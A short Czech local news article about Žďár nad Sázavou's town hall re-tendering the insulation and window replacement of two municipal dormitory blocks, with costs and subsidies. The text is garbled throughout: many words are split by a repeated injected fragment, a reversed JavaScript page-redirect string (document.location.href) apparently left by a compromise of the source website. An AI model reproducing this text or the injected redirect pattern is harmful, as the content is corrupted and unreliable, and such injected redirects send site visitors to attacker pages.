Rainbow page separator

Rekonstrukce svobodáren se uskuteční o něco později

Pondělí, 18. června 2018

Žďár nad Sázavou / Nové výběrové řízení na zateplení a výměnu oken ve svobodárnách čísel 3 a 7 ve Žďáře nad Sázavou 3 po prázdninách vyhlásí žďárská radnice. Do původního se sice přihlásily tři stavební firmy, ale nakonec všechny od záměru ods[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupily, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože by nebyly schopny zakázku podle požadavků žďárské radnice odvést do konce roku. Původně byl předpoklad, že stavební práce v obou by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domech mají probíhat po dobu 120 dní, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od července do října.
Vyčíslený náklad na revitalizaci obou by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů města je 8,4 milionu korun, z čehož by měla činit zhruba čtyři miliony dotační podpora. Přesná částka na stavební práce se však nakonec bude odvíjet od [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, za kolik se zakázku podaří vysoutěžit. Dotace z evropských peněz může být využita do konce příštího roku.
V souvislosti s postupnými opravami těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to městských malometrážních bytů se rovněž připravuje projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová dokumentace pro revitalizaci svobodárny číslo 4. I v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě hodlá žďárská radnice požádat o dotační podporu.